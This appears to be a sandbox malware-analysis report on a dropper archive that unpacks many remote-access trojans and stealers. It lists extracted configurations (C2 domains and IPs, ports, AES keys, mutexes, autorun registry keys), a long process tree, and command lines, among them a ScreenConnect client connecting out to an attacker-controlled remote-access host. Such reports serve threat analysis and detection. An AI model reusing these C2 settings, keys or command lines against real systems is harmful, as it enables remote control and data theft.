C2127.0.0.1
Ports2022
BotnetClient
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\220fe34d4dcc4a99fe35d2fb7ce78939
Splitter|'|'|
Versionim523

XWorm

(PID) Process(6800) services.exe
C2onlinegames.ddnsfree.com:2004
Keys
AES<01234567890>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.6
MutexLYpVZXdS0V7g4Ng2

RedLine

(PID) Process(4424) build.exe
C2 (1)212.162.149.48:2049
BotnetFOZ
Keys
Xor
Options
ErrorMessage

Quasar

(PID) Process(3016) SubDir.exe
Version1.4.1
C2 (3)192.168.1.10:4782
192.168.56.1:4782
Sub_DirSubDir
Install_NameSubDir.exe
Mutexbefa198a-cb1f-4160-a467-10fde2687968
StartupQuasar Client Startup
TagOffice04
LogDirLogs
Signaturef8akcWZRZRZsvBAcDWWUxZeTL3bCae+vyrOOe+8WkcOodbHR1iVrfZ5nQ+LAfviz0gT/3t4u5LyUudCY4eL8qMXTzNlTQ4oTpvSHiTNuz6POBTsEFyo5F3J7lyq3KaKynRMAcayO1yA5ZT+w4602d1hP0WTuvZZc5vwYGk53we8cbYERY1f02PyWAlzvvWGqhdqd/k3T2AoDDufJVZf0Q2cMalOZLMduUXE7q1WUdK6BoX8R+DVPg8CRrZOr+4o/F64QXL30fF5VTLTf4AAhib+WxIXhu+WHzjAwiiMH70lL...
CertificateMIIE9DCCAtygAwIBAgIQAN3jUXBqViG27ZfcVUcATTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI1MDIwOTAwMjE1NFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuvzaFrMDnsZu8WPeRJqz48UZifmneteIy4Ze6fM3pvdxCgcg/tamyfTN8v8sdTfSFwczN4Q/...

AsyncRat

(PID) Process(7384) tesst.exe
C2 (1)ratlordvc.ddns.net
Ports (1)6606
Version0.5.7B
BotnetDefault
Options
AutoRuntrue
MutexAsyncMutex_6SI8OkPnk
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQAO6DlPd9rfI0RQymNTPPTTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNDE2MDcyMjM2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIBmyzuVhS6vAZldZhyOQVUMzSQZSaNiJhoAHH3grZ4r0M5TldiOjM3k/PSaduQO6jEjlPGuAGlh...
Server_SignatureNo9LZL5kVgeYZMA00dOPEiYZkZBD72knkO0wjEUMXSDD3ctZvuK9mZUN/RmC4SYgP/iMZn7YZagSDackzhIM4INATR/rKx5x/6/ifWOIkySCNX+owbbmryQZt5NWIt0yyKG3d2VE0LRjHRs3a9P9F5uBb+rZRox4/qA4cy3CDEpyuV7G9Ml8a35bK3jX0qnNzVcoeyz/iqCK9TkQwJmtJbrAtheK09NA2T22SltCpfoHXWKVyyGMQ82SvRbHV/g0mcO7kE1LBkPq/w7/lumgqmMNp7b9kq0Qn+SBTuVqs0WL...
Keys
AESdf0a08ed89b436a40d34a3c5acb867ce8c52aa93adf357fc24ea3e7a7befceff
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0009
ZipCompression: Unknown (99)
ZipModifyDate: 2025:05:09 22:34:52
ZipCRC: 0x31d44928
ZipCompressedSize: 4869
ZipUncompressedSize: 10752
ZipFileName: 4363463463464363463463463.exe.bin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
1 171
Monitored processes
1 014
Malicious processes
89
Suspicious processes
107

Behavior graph

Click at the process to see the details
start winrar.exe sppextcomobj.exe no specs slui.exe rundll32.exe no specs 4363463463464363463463463.exe no specs #HAUSBOMBER 4363463463464363463463463.exe conhost.exe no specs svchost.exe no specs slui.exe #XOR-URL td.exe installer_ver09.10.25.exe no specs msiexec.exe winsetaccess64.exe no specs msiexec.exe dksngdsg.exe no specs #NJRAT microsoft_hardware_launch.exe #XWORM services.exe #NJRAT fusca%20game.exe msiexec.exe no specs rundll32.exe vssvc.exe no specs #REDLINE build.exe msbuild.exe alphatweaks.exe no specs netsh.exe no specs conhost.exe no specs ale1.exe no specs scottfinancials.pdf.exe msbuild.exe no specs msbuild.exe sound.exe no specs powershell.exe conhost.exe no specs netsh.exe no specs conhost.exe no specs 5142a417d128494b9a9d67961121e943.exe update.exe tgp_daemon.exe no specs #ASYNCRAT ddosziller.exe rah.exe alex12312321.exe no specs #QUASAR subdir.exe msbuild.exe te.exe #NJRAT njsilent.exe werfault.exe no specs cmd.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs timeout.exe no specs schtasks.exe no specs crypted.2.exe no specs loader.exe no specs #ASYNCRAT tesst.exe no specs msbuild.exe patch.exe werfault.exe no specs #NJRAT svchost.exe netsh.exe no specs conhost.exe no specs srtasks.exe no specs conhost.exe no specs msiexec.exe no specs 123.exe no specs conhost.exe no specs msiexec.exe no specs 123.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs whoami.exe no specs conhost.exe no specs aa_v3.exe no specs aa_v3.exe no specs aa_v3.exe xclient.exe no specs cloudy.exe #QUASARRAT client-built.exe asdasdasdasdasd.exe schtasks.exe no specs conhost.exe no specs application frame host.exe #REMCOS fxserver.exe cmd.exe no specs conhost.exe no specs reg.exe no specs wscript.exe no specs schtasks.exe no specs conhost.exe no specs shellexperiencehost.exe no specs werfault.exe no specs support.client.exe dfsvc.exe freeyoutubedownloader.exe cmd.exe no specs conhost.exe no specs #REMCOS googleupdate.exe cmd.exe no specs conhost.exe no specs svchost.exe no specs rmclient.exe no specs extremeinjector.exe reg.exe no specs conhost.exe no specs aspnet_regiis.exe free youtube downloader.exe no specs rundll32.exe qcoin140.exe %e7%8b%99%e5%87%bb%e6%89%8b_%e5%b9%bd%e7%81%b5%e6%88%98%e5%a3%ab2%e7%ae%80%e4%bd%93%e4%b8%ad%e6%96%87%e7%89%88.exe conhost.exe no specs cron2.exe no specs msbuild.exe software.exe discord.exe whoami.exe no specs conhost.exe no specs krishna33.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs installer.exe #LUMAR metatrader.exe msibe22.tmp no specs viewer.exe no specs cmd.exe no specs conhost.exe no specs beacon_x64.exe no specs cmd.exe no specs cmd.exe no specs reg.exe no specs wmic.exe no specs findstr.exe no specs chrome.exe viewer.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs mode.com no specs cmd.exe no specs chrome.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs taskkill.exe no specs mode.com no specs filea.exe no specs netsh.exe no specs chsztdjvl.exe no specs timeout.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs netsh.exe no specs wmic.exe no specs findstr.exe no specs taskhost.exe viewer.exe no specs viewer.exe no specs timeout.exe no specs taskkill.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs timeout.exe no specs cmd.exe no specs cmd.exe no specs reg.exe no specs wmic.exe no specs findstr.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs mode.com no specs cmd.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs mode.com no specs netsh.exe no specs taskkill.exe no specs netsh.exe no specs taskkill.exe no specs timeout.exe no specs wmic.exe no specs findstr.exe no specs timeout.exe no specs stub.exe viewer.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs reg.exe no specs wmic.exe no specs findstr.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs mode.com no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs reg.exe no specs taskkill.exe no specs cmd.exe no specs cmd.exe no specs mode.com no specs netsh.exe no specs jf.exe netsh.exe no specs wmic.exe no specs findstr.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs vpnwinsetup.exe no specs stub.exe cmd.exe no specs conhost.exe no specs reg.exe no specs find.exe no specs reg.exe no specs find.exe no specs reg.exe no specs find.exe no specs reg.exe no specs find.exe no specs svchogz.exe net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs ping.exe no specs cmd.exe no specs conhost.exe no specs qrtb.exe yceoce.exe msiexec.exe cmd.exe no specs #NANOCORE jij.exe msiexec.exe no specs cmd.exe no specs crypted.exe rundll32.exe conhost.exe no specs #PURELOGS crypted.exe asyncclient.exe no specs werfault.exe no specs wmic.exe no specs e.exe cmd.exe powershell.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs #QUASARRAT amogus.exe nersready.exe no specs conhost.exe no specs #RAT apiupdater.exe cmd.exe no specs werfault.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs wscript.exe no specs reg.exe no specs win64.exe new.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs img001.exe cmd.exe no specs conhost.exe no specs chcp.com no specs cmd.exe no specs reg.exe no specs conhost.exe no specs runtimebroker.exe taskkill.exe no specs cpdb.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs powershell.exe reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs werfault.exe no specs applaunch.exe no specs applaunch.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs tftp.exe no specs srtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs msiexec.exe no specs win64.exe cmd.exe no specs conhost.exe no specs netsh.exe no specs schtasks.exe no specs conhost.exe no specs msiexec.exe no specs autoupdate.exe no specs #SCREENCONNECT screenconnect.clientservice.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs 1223.exe conhost.exe no specs chcp.com no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs pornhub_downloader.exe no specs screenconnect.windowsclient.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs screenconnect.windowsclient.exe no specs mshta.exe no specs nvnc.exe conhost.exe no specs img001.exe pornhub_downloader.exe no specs cmd.exe no specs msedge.exe no specs nvnc.exe no specs cmd.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs reg.exe no specs evetbeta.exe taskkill.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs %e6%b8%85%e7%90%86%e5%9e%83%e5%9c%be.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs cmd.exe no specs msedge.exe msedge.exe no specs attrib.exe no specs powershell.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs 1465810408079_502.exe tftp.exe dpinst_amd64.exe no specs win64.exe schtasks.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe conhost.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs powercfg.exe no specs ping.exe no specs reg.exe no specs powercfg.exe no specs powercfg.exe no specs screenconnect.windowsclient.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs box.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs powershell.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs msedge.exe no specs win64.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs win64.exe powershell.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs installer_ver19.02.exe no specs conhost.exe no specs installer_ver19.02.exe qupdate.exe jd127.exe zxcdw12.exe no specs f88253a.exe win64.exe qcoin140.exe schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs #GENERIC mixseven.exe powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe no specs conhost.exe no specs svchost015.exe f88253a.exe no specs box.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe no specs conhost.exe no specs kms_activator.exe boleto.exe win64.exe #QUASARRAT spectrum.exe f88253a.exe no specs explorer.exe no specs cvtres.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs java updater.exe chcp.com no specs ping.exe no specs itplan.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs cmdkey.exe no specs mstsc.exe latestleave.exe no specs werfault.exe no specs f88253a.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe no specs conhost.exe no specs nc.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #QUASAR adobepdfreader.exe f88253a.exe no specs msedge.exe no specs explorer.exe no specs cvtres.exe no specs cvtres.exe conhost.exe no specs explorer.exe no specs schtasks.exe no specs conhost.exe no specs adobepdfreader.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs schtasks.exe no specs conhost.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe conhost.exe no specs explorer.exe no specs cmd.exe no specs conhost.exe no specs win64.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs chcp.com no specs conhost.exe no specs powershell.exe no specs ping.exe no specs powershell.exe no specs schtasks.exe no specs conhost.exe no specs cryptography_module_windows.exe conhost.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe conhost.exe no specs explorer.exe no specs tasklist.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs ale12312.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs ping.exe no specs kali_tools.exe powershell.exe no specs powershell.exe no specs #QUASARRAT svhost.exe wildfire-test-pe-file.exe no specs conhost.exe no specs f88253a.exe no specs schtasks.exe no specs explorer.exe no specs cvtres.exe conhost.exe no specs conhost.exe no specs lukejazz.exe no specs msbuild.exe no specs msbuild.exe svhost.exe cryptography_module_windows.exe no specs tasklist.exe no specs findstr.exe no specs explorer.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs #QUASARRAT wenzcord.exe f88253a.exe no specs explorer.exe no specs cvtres.exe conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs jy.exe explorer.exe no specs powershell.exe no specs jy.tmp addmefast%20bot.exe no specs adobepdfreader.exe schtasks.exe no specs conhost.exe no specs powershell.exe no specs fast%20download.exe cmd.exe no specs conhost.exe no specs wenzcord.exe f88253a.exe no specs plantrojan.exe explorer.exe no specs cvtres.exe no specs cvtres.exe conhost.exe no specs explorer.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs win64.exe cmd.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs THREAT we64.exe f88253a.exe no specs explorer.exe no specs cvtres.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs explorer.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs chcp.com no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe no specs chcp.com no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs hl2dm_updater.exe cmd.exe no specs ping.exe no specs conhost.exe no specs cmd.exe f88253a.exe no specs conhost.exe no specs f88253a.exe no specs explorer.exe no specs cvtres.exe no specs cvtres.exe conhost.exe no specs explorer.exe no specs ping.exe no specs sc.exe no specs chcp.com no specs ping.exe no specs attrib.exe no specs extrac32.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs attrib.exe no specs powershell.exe no specs net.exe no specs powershell.exe no specs net1.exe no specs sc.exe no specs net.exe no specs net1.exe no specs sc.exe no specs taskkill.exe no specs msedge.exe findstr.exe no specs f88253a.exe no specs hl2dm_updater.new.exe no specs explorer.exe no specs cvtres.exe news_01.exe no specs conhost.exe no specs hl2dm_updater.exe taskkill.exe no specs explorer.exe no specs cmd.exe no specs svchost.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe no specs powershell.exe no specs svchost.exe no specs powershell.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs cmd.exe no specs svchost.exe no specs svchost.exe no specs powershell.exe no specs adobepdfreader.exe svchost.exe no specs svchost.exe no specs taskkill.exe no specs wenzcord.exe taskkill.exe no specs win64.exe relay.com schtasks.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs output.exe tasklist.exe no specs conhost.exe no specs taskkill.exe no specs findstr.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs xclient.exe schtasks.exe no specs cctv_sk8_crypted_lab.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs jokererer.exe no specs msiexec.exe conhost.exe no specs conhost.exe no specs taskkill.exe no specs msbuild.exe msbuild.exe keylogger.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs fuck122112.exe choice.exe no specs #NJRAT goodfrag.exe #LUMMA fuck122112.exe msiexec.exe no specs chcp.com no specs chcp.com no specs chcp.com no specs ping.exe no specs werfault.exe no specs rundll32.exe bootstrapper.exe mos%20ssssttttt.exe no specs werfault.exe no specs ping.exe no specs ping.exe no specs vssvc.exe no specs ping.exe no specs billi_e58d74e455634dc695ed8a7b8b320325.exe.upx.exe testme.exe no specs schtasks.exe no specs conhost.exe no specs #NJRAT runtime broker.exe ping.exe no specs ping.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs win64.exe attrib.exe no specs wenzcord.exe adobepdfreader.exe screenconnect.windowsclient.exe no specs attrib.exe no specs attrib.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs net.exe no specs find.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe no specs chcp.com no specs chcp.com no specs chcp.com no specs svchost.exe no specs svchost.exe no specs conhost.exe no specs #MINER taskmgr.exe conhost.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs netsh.exe no specs conhost.exe no specs reg.exe no specs screenconnect.windowsclient.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs netsh.exe no specs netsh.exe no specs conhost.exe no specs netsh.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs netsh.exe no specs netsh.exe no specs wenzcord.exe win64.exe adobepdfreader.exe netsh.exe no specs conhost.exe no specs netsh.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs netsh.exe no specs chcp.com no specs chcp.com no specs chcp.com no specs netsh.exe no specs reg.exe no specs ping.exe no specs powershell.exe conhost.exe no specs ping.exe no specs netsh.exe no specs ping.exe no specs netsh.exe no specs netsh.exe no specs screenconnect.windowsclient.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs reg.exe no specs powershell.exe conhost.exe no specs regasm.exe no specs win64.exe wenzcord.exe adobepdfreader.exe schtasks.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs box.exe no specs cmd.exe no specs screenconnect.windowsclient.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs chcp.com no specs chcp.com no specs reg.exe no specs ping.exe no specs reg.exe no specs ping.exe no specs takeown.exe no specs ping.exe no specs icacls.exe no specs taskkill.exe no specs #LUMMA svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
132C:\WINDOWS\system32\cmd.exe /c ""C:\Games\c.cmd" "C:\Windows\SysWOW64\cmd.exeviewer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
15
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
236"C:\Program Files (x86)\ScreenConnect Client (d724279e76808474)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=control.gandizon.com&p=8041&s=5b8e1b6f-ee05-4413-a3f8-59777739d450&k=BgIAAACkAABSU0ExAAgAAAEAAQAZ3y3oX8w7yYbQbwWyh2tsuWyy101A0izwU5WSpslaCTqahFkxsNThqZ2DXJG4n044XCVtLTioTA%2bIgJI2aINklbR8nh7cKGX1Vr%2fmjKK9pbLSHNH2mS81X%2bYdRqhp6yvAx%2fUxhKJaGd%2b%2f6B72%2b3RbKPbQFKvQqBiVb3PXgQs38JKmzBzjGlUkPJIrK1KQAtSyvJ4rw7fOEz4n%2fsbd3gT3C7prgQ9DgT2yGxG6rBkvnagiKFFKjn%2bbaSwc%2bjPiQm8BVOiT3cWdyKBrHDRAZ%2fpUq8M3v2Ijio2SeWie8BFTOFNCxYF8asD%2fJDBEFaVDS65G%2brfPxRkfdRw%2fxjgRpgXM&c=plaza&c=&c=&c=&c=&c=&c=&c="C:\Program Files (x86)\ScreenConnect Client (d724279e76808474)\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
24.4.4.9118
Modules
Images
c:\program files (x86)\screenconnect client (d724279e76808474)\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
616"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
dksngdsg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll
660"C:\Users\admin\Desktop\hausbomber\Files\winsetaccess64.exe" C:\Users\admin\Desktop\hausbomber\Files\winsetaccess64.exe4363463463464363463463463.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\hausbomber\files\winsetaccess64.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
664"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d724279e76808474\ScreenConnect.ClientSetup.msi"C:\Windows\SysWOW64\msiexec.exe
installer_ver09.10.25.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
680netsh ipsec static add filterlist name=AllowlistC:\Windows\SysWOW64\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
736taskkill /im rundll32.exe /fC:\Windows\SysWOW64\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
